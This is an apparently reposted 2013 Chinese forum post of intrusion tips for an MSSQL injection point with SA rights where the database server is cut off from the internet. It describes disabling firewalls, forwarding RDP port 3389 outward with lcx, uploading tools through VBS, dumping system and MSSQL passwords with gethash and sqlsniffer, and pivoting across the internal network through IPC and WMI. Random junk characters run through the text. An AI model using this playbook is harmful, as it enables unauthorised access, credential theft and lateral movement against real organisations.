当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。. w' r c' x Y) X: }) r$ c, R
6 m' S/ p5 ?, p+ ^% P8 s+ A3 s- d8 @; M/ G% g% y: ^4 K: \6 t
- ` p: e) e1 [6 k; o0 j) b! R: ]
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
- s7 o* B0 y. f6 H+ _+ Z: [) T/ @. g3 u" W; L. K
: c, D* _4 }: L* M" M! o. q一、DB机有公网IP.
# F' w; {6 S" @; [8 H6 t& u- Z; e* M0 C: ^# t, d, w9 b
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
/ s' z. L9 D5 q3 C( a3 t# X0 n6 t) V3 y; H0 P) y& S; u
) I2 l9 g8 O8 }- H( Y2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389." Z; ^5 W3 t, q3 t( B) y. {
% n' g1 Q! _& F- e- `2 @% F$ Q% d; Z% k, u5 s% e1 d. |* i& t
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com( E! A) S. D. j3 L0 R
6 @* [3 Q2 S4 `+ Y+ S5 n9 e" M
* T% `, T/ N. J$ `9 y& W& P; e4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.; } Y* o( n* D. E$ T
. R3 |2 t1 i1 {+ D1 u3 Y' u
$ e1 G& W& R4 Z6 _0 x
" }1 ]9 C: [$ ]+ j
二、DB机只有内网IP% m3 [" u8 ]( t; Z: w% i6 t( g
9 L; \' v, E. h9 `8 L1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
Y6 D" R1 R! u0 A) E; S+ w
& |% |) m6 J+ A: ?: f/ ~3 r& Q; I, P4 u
2:停掉防火墙和IP策略再从内往外扫描.
$ M: |( m% ^6 v/ a V D8 k# L+ p' Q% N* d6 _1 g. J2 B
5 w6 b. l, } Q3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.. o J9 Z" b. G2 C1 ?1 d4 X4 e
2 M$ M7 Y8 I- A3 X6 E$ U
! F+ T7 I/ j* V4 W0 n5 W" R& h9 F
4:学会密码规律分析往往会有惊喜.& }( I- x, L0 b* Q5 n1 d" f
* w* |/ q2 K* g b1 B5 T2 P9 H
( Z/ g1 n5 u3 G& T5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等- Z* u: ~( u$ S9 B6 B
6 P3 _! B# t! I4 S
% h- o0 m6 Y$ L. H有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对